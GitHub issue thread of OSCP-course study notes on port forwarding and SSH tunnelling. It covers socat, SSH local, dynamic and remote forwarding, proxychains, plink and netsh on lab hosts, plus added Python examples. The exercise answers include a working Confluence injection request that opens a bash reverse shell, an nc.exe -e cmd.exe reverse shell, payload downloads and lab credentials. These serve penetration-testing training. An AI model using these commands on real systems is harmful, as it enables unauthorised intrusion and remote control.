WDavid404 / OSCP


18. Port Redirection and SSH Tunneling #19

Open WDavid404 opened 9 months ago

WDavid404 commented 9 months ago

18.2. Port Forwarding with Linux Tools

WDavid404 commented 9 months ago

https://ameblo.jp/bakery-diary/entry-12618175162.html

ip route

Taking the second line of the example command output, the fields are explained in numbered order: ①172.17.0.0/16 ②dev eth1 ③proto kernel ④scope link ⑤src 172.17.0.1

Number / key (if any): meaning
① Destination network.
② dev: the network interface (NIC) that packets leave from to reach the destination network.
③ proto: how this routing entry was created. kernel means the kernel generated it (dynamic routing); static means it was created by hand (static routing).
④ scope: the kind of destination. host means the destination is this host itself; link means the destination is the local network; global (or no scope shown) means an external network. When the scope is global, the next-hop router is given separately by the via key (see the first line of the example output).
⑤ src: the source IP address.
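
As an added example (not part of the original notes or the quoted blog), here is a small Python parser for `ip route` lines that pulls out the fields listed above and then does the longest-prefix match the kernel does, so you can tell which interface and next hop a pivot target is reached through. The two sample lines are constructed to match the two-line output the note describes; the gateway address 172.17.0.254 in them is an assumption.

```python
"""Parse `ip route` output into dst / via / dev / proto / scope / src and pick the
route the kernel would use for a given address.  Added example, not from the notes."""
import ipaddress

# Constructed sample output (assumption: the usual two-line listing the note refers to).
SAMPLE_IP_ROUTE = """\
default via 172.17.0.254 dev eth1
172.17.0.0/16 dev eth1 proto kernel scope link src 172.17.0.1
"""

# Keys that take exactly one following value on an `ip route` line.
_VALUE_KEYS = {"via", "dev", "proto", "scope", "src", "metric", "table"}


def parse_route_line(line):
    """Turn one `ip route` line into a dict.

    The first token is the destination ('default' or a prefix).  The rest are
    key/value pairs; 'scope' defaults to 'global' when omitted, which matches the
    note that a missing scope means an external (routed) destination.
    """
    tokens = line.split()
    if not tokens:
        return None
    route = {"dst": tokens[0], "scope": "global"}
    i = 1
    while i < len(tokens):
        key = tokens[i]
        if key in _VALUE_KEYS and i + 1 < len(tokens):
            route[key] = tokens[i + 1]
            i += 2
        else:
            # bare flags such as 'linkdown' or 'onlink' carry no value
            route.setdefault("flags", []).append(key)
            i += 1
    return route


def parse_ip_route(text):
    """Parse a whole `ip route` listing, skipping blank lines."""
    return [r for r in (parse_route_line(l) for l in text.splitlines()) if r]


def route_for(routes, ip):
    """Longest-prefix match, the way the kernel selects the outgoing route.

    Returns the matching route dict, or None if nothing (not even 'default') fits.
    """
    addr = ipaddress.ip_address(ip)
    best, best_len = None, -1
    for r in routes:
        net = (ipaddress.ip_network("0.0.0.0/0") if r["dst"] == "default"
               else ipaddress.ip_network(r["dst"], strict=False))
        if addr in net and net.prefixlen > best_len:
            best, best_len = r, net.prefixlen
    return best


if __name__ == "__main__":
    routes = parse_ip_route(SAMPLE_IP_ROUTE)
    for r in routes:
        print(r)
    # A host inside 172.17.0.0/16 is reached directly (scope link) on eth1 ...
    print(route_for(routes, "172.17.5.9"))
    # ... while anything else leaves through the default gateway.
    print(route_for(routes, "10.4.50.215"))
```

Run it against real output with `parse_ip_route(subprocess.check_output(["ip", "route"], text=True))`; a `via` key on the chosen route is the sign that the target is not on a directly attached network.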
WDavid404 commented 9 months ago

Socat port forwarding

If socat is not installed on the target machine, you can try to download and install it.

1.

socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 --> Note: there must be no space between the comma and fork.


On Kali: connect to CONFLUENCE01 (-h 192.168.50.63) on port 2345 (-p 2345) with the postgres user account (-U postgres)

kali@kali:~$ psql -h 192.168.50.63 -p 2345 -U postgres
Password for user postgres: 
...

2.

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22


On Kali

kali@kali:~$ ssh database_admin@192.168.50.63 -p2222

WDavid404 commented 9 months ago

18.3. SSH Tunneling

18.3.1. SSH Local Port Forwarding

On CONFLUENCE01 machine

ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215

The -N flag prevents SSH from executing any remote commands, meaning we will only receive output related to our port forward.


On kali

kali@kali:~$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234


kali@kali:~$ smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

WDavid404 commented 9 months ago

18.3.2. SSH Dynamic Port Forwarding

Local port forwarding has one glaring limitation: we can only connect to one socket per SSH connection. This can make it quite tedious to use at scale. Luckily, OpenSSH also provides dynamic port forwarding. From a single listening port on the SSH client, packets can be forwarded to any socket that the SSH server host has access to.

SSH dynamic port forwarding works because the listening port that the SSH client creates is a SOCKS proxy server port. SOCKS is a proxying protocol.

confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
.....

We'll want to use smbclient again. However, we find that smbclient doesn't natively provide an option to use a SOCKS proxy. Without a native option to use a SOCKS proxy in smbclient, we can't take advantage of our dynamic port forward. The SOCKS proxy can't determine how to handle traffic that isn't encapsulated in the SOCKS protocol format.

To use smbclient in this situation, we'll leverage Proxychains. Proxychains is a tool that can force network traffic from third party tools over HTTP or SOCKS proxies. As the name suggests, it can also be configured to push traffic over a chain of concurrent proxies.

Proxychains uses a configuration file for almost everything, stored by default at /etc/proxychains4.conf. By default, proxies are defined at the end of the file. We can simply replace any existing proxy definition in that file with a single line defining the proxy type, IP address, and port of the SOCKS proxy running on CONFLUENCE01 (socks5 192.168.50.63 9999).

kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 192.168.50.63 9999

The Proxychains configuration file, pointing towards the SOCKS proxy set up on CONFLUENCE01.

kali@kali:~$ proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217
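
Added example (not code from these notes, nor from socat, OpenSSH or proxychains): a loopback-only Python model of both listeners discussed so far. `start_forwarder` is the `socat TCP-LISTEN:<port>,fork TCP:<host>:<port>` relay from 18.2 (fixed destination, no protocol on the wire), `start_socks5_proxy` is the listener that `ssh -D` creates (each client names its destination in a SOCKS5 CONNECT request), and `socks5_connect` is the handshake proxychains injects in front of a SOCKS-unaware client such as smbclient. `demo` sends the same bytes three ways; the third, straight to the SOCKS port without the handshake, comes back empty because the proxy drops anything that does not start as a SOCKS5 greeting. The echo server standing in for the internal host and the SMB-looking payload are constructed; only CONNECT to an IPv4 address is implemented.

```python
import socket
import struct
import threading

def _pump(src, dst):
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)                 # pass the EOF on to the other side
        except OSError:
            pass

def _relay(a, b):
    threading.Thread(target=_pump, args=(b, a), daemon=True).start()
    _pump(a, b)

def _serve(handler):
    """Accept on an ephemeral loopback port, one thread per client; returns (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def loop():
        while True:
            threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()

def start_forwarder(dest):
    """socat TCP-LISTEN:<port>,fork TCP:<dest>: a fresh upstream connection and relay per client."""
    def handle(client):
        try:
            _relay(client, socket.create_connection(dest, timeout=5))
        except OSError:
            client.close()
    return _serve(handle)

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf

def start_socks5_proxy():
    """The listener `ssh -D` creates: each client names its own destination in a SOCKS5 CONNECT."""
    def session(client):
        try:
            ver, nmethods = _recv_exact(client, 2)
            if ver != 5 or 0 not in _recv_exact(client, nmethods):
                return client.close()                    # not SOCKS5 at all: dropped silently
            client.sendall(bytes([5, 0]))                # method 0 selected: no authentication
            ver, cmd, _rsv, atyp = _recv_exact(client, 4)
            if ver != 5 or cmd != 1 or atyp != 1:        # only CONNECT to an IPv4 address here
                rep, upstream = 7, None                  # REP=7: command not supported
            else:
                dest = (socket.inet_ntoa(_recv_exact(client, 4)), struct.unpack("!H", _recv_exact(client, 2))[0])
                try:
                    upstream, rep = socket.create_connection(dest, timeout=5), 0
                except OSError:
                    upstream, rep = None, 5              # REP=5: connection refused
            client.sendall(bytes([5, rep, 0, 1]) + b"\0" * 6)   # reply; BND.ADDR/BND.PORT left zero
        except OSError:
            return client.close()
        _relay(client, upstream) if upstream else client.close()
    return _serve(session)

def socks5_connect(proxy, dest_ip, dest_port):
    """Client side of RFC 1928, the part proxychains adds in front of smbclient."""
    s = socket.create_connection(proxy, timeout=5)
    s.sendall(bytes([5, 1, 0]))                          # VER=5, one method offered: no auth
    if _recv_exact(s, 2) != bytes([5, 0]):
        raise ConnectionError("proxy refused the no-auth method")
    s.sendall(bytes([5, 1, 0, 1]) + socket.inet_aton(dest_ip) + struct.pack("!H", dest_port))
    rep = _recv_exact(s, 10)[1]                          # VER REP RSV ATYP BND.ADDR(4) BND.PORT(2)
    if rep != 0:
        raise ConnectionError("CONNECT rejected, REP=%d" % rep)
    return s                                             # from here on it is a plain TCP stream

def _exchange(sock, payload):
    """Send payload, signal EOF, collect the reply; b'' when the peer just drops us."""
    with sock:
        try:
            sock.sendall(payload)
            sock.shutdown(socket.SHUT_WR)
            return b"".join(iter(lambda: sock.recv(4096), b""))
        except OSError:
            return b""

def demo(payload):
    """Same bytes via the socat-style forward, via SOCKS5, and raw to the SOCKS port."""
    echo = _serve(lambda c: _pump(c, c))                 # constructed stand-in for an internal host
    fwd, proxy = start_forwarder(echo), start_socks5_proxy()
    return (_exchange(socket.create_connection(fwd, timeout=5), payload),
            _exchange(socks5_connect(proxy, *echo), payload),
            _exchange(socket.create_connection(proxy, timeout=5), payload))
```

Call `demo(b"\xfeSMB probe")` (a constructed SMB-looking payload): the first two results are the payload echoed back, the third is empty. That empty result is exactly the smbclient-without-proxychains failure described above, and it is also why a port scan of the SOCKS port itself tells you nothing about the internal network: the proxy only speaks to clients that open with the SOCKS5 greeting.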

WDavid404 commented 9 months ago

18.3.3. SSH Remote Port Forwarding

-L and -D port forwarding is more challenging in the real world because of firewalls, both hardware and software. Inbound traffic is often controlled much more aggressively than outbound traffic.


Step:

  1. On kali machine

kali@kali:~$ sudo systemctl start ssh

Note: In order to connect back to the Kali SSH server using a username and password, you may have to explicitly allow password-based authentication by setting PasswordAuthentication to yes in /etc/ssh/sshd_config (note that it is sshd_config, not ssh_config).

grep 'PasswordAuthentication ' /etc/ssh/sshd_config

kali@kali:~$ sudo ss -ntplu

  2. On CONFLUENCE01 machine

confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
.....



  3. On kali machine

kali@kali:~$ ss -ntplu

kali@kali:~$ psql -h 127.0.0.1 -p 2345 -U postgres
WDavid404 commented 9 months ago

18.3.4. SSH Remote Dynamic Port Forwarding

On CONFLUENCE01 machine

confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 9998 kali@192.168.118.4

On Kali: sudo ss -ntplu


kali@kali:~$ tail /etc/proxychains4.conf


kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64


18.3.5. Using sshuttle

sshuttle is a tool that turns an SSH connection into something similar to a VPN by setting up local routes that force traffic through the SSH tunnel. However, it requires root privileges on the SSH client and Python3 on the SSH server, so it's not always the most lightweight option. In the appropriate scenario, however, it can be very useful.

WDavid404 commented 9 months ago

18.4. Port Forwarding with Windows Tools

18.4.1. ssh.exe

On Windows versions with SSH installed, we will find scp.exe, sftp.exe, ssh.exe, along with other ssh-* utilities, in %systemdrive%\Windows\System32\OpenSSH by default.

  1. On Kali

kali@kali:~$ sudo systemctl start ssh

RDP to the Windows machine:

kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64

  2. On Windows machine:

C:\Users\rdp_admin>where ssh
C:\Users\rdp_admin>ssh.exe -V
### If the version of OpenSSH bundled with Windows is higher than 7.6, we can use it for remote dynamic port forwarding.

C:\Users\rdp_admin>ssh -N -R 9998 kali@192.168.118.4


  3. On Kali

kali@kali:~$ ss -ntplu

kali@kali:~$ tail /etc/proxychains4.conf
...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998

kali@kali:~$ proxychains psql -h 10.4.50.215 -U postgres
18.4.2. Plink

Before OpenSSH was so readily available on Windows, most network administrators' tools of choice were PuTTY and its command-line-only counterpart, Plink.

To download nc.exe onto MULTISERVER03 (Windows machine), we first need to host it on a server that MULTISERVER03 can access. We can easily configure Apache2 on our Kali machine to do this. Apache2 is installed by default on Kali, so we just need to start the apache2 service.
kali@kali:~$ sudo systemctl start apache2

kali@kali:~$ find / -name nc.exe 2>/dev/null
/usr/share/windows-resources/binaries/nc.exe

kali@kali:~$ sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/


On Windows machine:

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446

We now want to download Plink to MULTISERVER03. 
On our Kali machine, we can copy plink.exe from windows-resources/binaries to the Apache2 web root.

kali@kali:~$ find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe

kali@kali:~$ sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/


On Windows

c:\windows\system32\inetsrv>powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

c:\windows\system32\inetsrv>C:\Windows\Temp\plink.exe -ssh -l kali -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4



On Kali
`kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833`
WDavid404 commented 9 months ago


18.4.3. Netsh

Windows also ships the built-in firewall configuration tool Netsh (also known as Network Shell). Using Netsh, we can set up a port forward with the portproxy subcontext within the interface context.

The portproxy subcontext of the netsh interface command requires administrative privileges to make any changes. This means that in most cases we will need to take UAC into account. In this example, we're running it in a shell over RDP using an account with administrator privileges, so UAC is not a concern. However, we should bear in mind that UAC may be a stumbling block in other setups.


kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64

On Windows We'll instruct netsh interface to add a portproxy rule from an IPv4 listener that is forwarded to an IPv4 port (v4tov4). This will listen on port 2222 on the external-facing interface (listenport=2222 listenaddress=192.168.50.64) and forward packets to port 22 on PGDATABASE01 (connectport=22 connectaddress=10.4.50.215). Run cmd.exe as administrator to open a command window.

C:\Windows\system32>netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

C:\Windows\system32>

Although we don't receive any output from the command, we can confirm that port 2222 is listening using netstat.

C:\Windows\system32>netstat -anp TCP | find "2222"
  TCP    192.168.50.64:2222     0.0.0.0:0              LISTENING
C:\Windows\system32>netsh interface portproxy show all

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.50.64   2222        10.4.50.215     22

On Kali

kali@kali:~$ sudo nmap -sS 192.168.50.64 -Pn -n -p2222

The response shows that port 2222 is filtered. It's most likely that the Windows Firewall is blocking inbound connections to port 2222.


We'll allow connections on the local port (localport=2222) on the interface with the local IP address (localip=192.168.50.64) using the TCP protocol, specifically for incoming traffic (dir=in).

C:\Windows\system32> netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow
Ok.

On Kali

kali@kali:~$ ssh database_admin@192.168.50.64 -p2222

To delete firewall rule

C:\Users\Administrator>netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

Deleted 1 rule(s).
Ok.

To delete proxy rule

C:\Windows\Administrator> netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

C:\Windows\Administrator>
WDavid404 commented 8 months ago

Questions

18.3.1 Q2

172.16.233.217- HRSHARES 
10.4.233.215 - PGDATABASE01 - database_admin/sqlpass123
192.168.233.63 - CONFLUENCE01

192.168.45.203 - Kali
  1. On Kali:

curl http://192.168.233.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.203/4444%200%3E%261%27%29.start%28%29%22%29%7D/

--> nc -vlp 4444 will get a reverse shell from CONFLUENCE01

  2. 
confluence@confluence01:/opt/atlassian/confluence/bin$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
4: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:86:c2:5e brd ff:ff:ff:ff:ff:ff
    inet 192.168.233.63/24 brd 192.168.233.255 scope global ens192
       valid_lft forever preferred_lft forever
5: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:86:dc:50 brd ff:ff:ff:ff:ff:ff
    inet 10.4.233.63/24 brd 10.4.233.255 scope global ens224
       valid_lft forever preferred_lft forever

  3. Must run:

python3 -c 'import pty; pty.spawn("/bin/bash")'


4. setup a local port forwarding on CONFLUENCE01

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -L 0.0.0.0:4455:172.16.233.217:445 database_admin@10.4.233.215

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -L 0.0.0.0:4242:172.16.233.217:4242 database_admin@10.4.233.215
Could not create directory '/home/confluence/.ssh'.
The authenticity of host '10.4.233.215 (10.4.233.215)' can't be established.
ECDSA key fingerprint is SHA256:GMUxFQSTWYtQRwUc9UvG2+8toeDPtRv3sjPyMfmrOH4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/confluence/.ssh/known_hosts).
database_admin@10.4.233.215's password: sqlpass123


!!Note:  If you don't execute the following command,
`python3 -c 'import pty; pty.spawn("/bin/bash")'`
you will encounter the issue below when trying the ssh local port forwarding.

Could not create directory '/home/confluence/.ssh'. Host key verification failed.


5. Download ./ssh_local_client file
  6. chmod a+x ./ssh_local_client --> If you don't do it, running ./ssh_local_client will give the error message below.

└─$ ./ssh_local_client
zsh: permission denied: ./ssh_local_client



  7. ./ssh_local_client -i 192.168.233.63 -p 4242 ---> Get flag!
WDavid404 commented 7 months ago

18.3.2 Q2

  1. Same as 18.3.1 Q2, get reverse shell from CONFLUENCE01

  2. python3 -c 'import pty; pty.spawn("/bin/bash")'

  3. ssh -N -D 0.0.0.0:4455 database_admin@10.4.233.215

  4. On kali, edit '/etc/proxychains4.conf' as below

  5. On Kali, download ssh_dynamic_client file

  6. chmod a+x ./ssh_dynamic_client

  7. proxychains nmap -sT < HRSHARES IP> ---------> According to 18.3.2 Q1, port 4872 is open

  8. proxychains ./ssh_dynamic_client -i < HRSHARES IP> -p 4872

WDavid404 commented 7 months ago

18.3.2 Q3

10.4.236.215 - PGDATABASE01
192.168.236.63 - CONFLUENCE01
192.168.45.224 -- Kali
  1. On kali, sudo systemctl start ssh

  2. Edit and make sure Kali's sshd allows username/password authentication: grep 'PasswordAuthentication ' /etc/ssh/sshd_config

  3. Same as 18.3.1 Q2, get reverse shell from CONFLUENCE01

  4. python3 -c 'import pty; pty.spawn("/bin/bash")'

  5. ssh -N -R 127.0.0.1:4455:10.4.236.215:4444 kali@192.168.45.224

  6. On Kali, check if the ssh remote tunnel has been established.

  7. Download ssh_remote_client

  8. chmod a+x ssh_remote_client

  9. ./ssh_remote_client -i 127.0.0.1 -p4455

WDavid404 commented 7 months ago

18.3.2 Q4

10.4.236.215 - PGDATABASE01
192.168.236.63 - CONFLUENCE01 
192.168.236.64 - MULTISERVER03 --> Internal IP: 10.4.236.64
192.168.45.224 -- Kali
  1. On kali, sudo systemctl start ssh

  2. On kali, edit '/etc/proxychains4.conf' as below

  3. Same as 18.3.1 Q2, get reverse shell from CONFLUENCE01

  4. python3 -c 'import pty; pty.spawn("/bin/bash")'

  5. ssh -N -R 9999 kali@192.168.45.224

  6. On kali, check if the tunnel has been established by sudo ss -ntplu

  7. On Kali, download ssh_remote_dynamic_client

  8. chmod a+x ssh_remote_dynamic_client

  9. proxychains ./ssh_remote_dynamic_client -i 10.4.236.64 -p 9062 (port 9062 is open according to 18.3.4 Q1)

WDavid404 commented 7 months ago

18.4.1 Q1

192.168.196.64  - MULTISERVER03 
10.4.196.215 - PGDATABASE01 

192.168.45.236 - Kali
  1. RDP login to MULTISERVER03: xfreerdp /u:rdp_admin /p:'P@ssw0rd!' /f +fonts +clipboard /v:192.168.196.64 /h:400 /w:600

  2. ssh -N -R 8899 kali@192.168.45.236

  3. On kali, confirm that ssh is running (ps -a|grep ssh) and the port 8899 tunnel is established.

  4. make sure /etc/proxychains4.conf is as below

  5. Download ssh_exe_exercise_client.bin file and execute 'chmod a+x' for it

  6. proxychains ./ssh_exe_exercise_client.bin -i 10.4.196.215 -p 4141


18.4.2 Q2

192.168.193.64 - MULTISERVER03 
10.4.193.215 - PGDATABASE01

192.168.45.203 - Kali
  1. RDP login to MULTISERVER03: xfreerdp /u:rdp_admin /p:'P@ssw0rd!' /f +fonts +clipboard /v:192.168.193.64 /h:400 /w:600
  2. Add portproxy: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.193.64 (--> MULTISERVER03's IP) connectport=4545 connectaddress=10.4.193.215

You can confirm it by netsh interface portproxy show all

  3. Add FW allow rule: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.193.64 (MULTISERVER03's IP) localport=2222 action=allow

  4. On kali, confirm port 2222 is open on MULTISERVER03

  5. Download netsh_exercise_client.bin file and chmod a+x for it.

  6. ./netsh_exercise_client.bin -i 192.168.193.64 -p 2222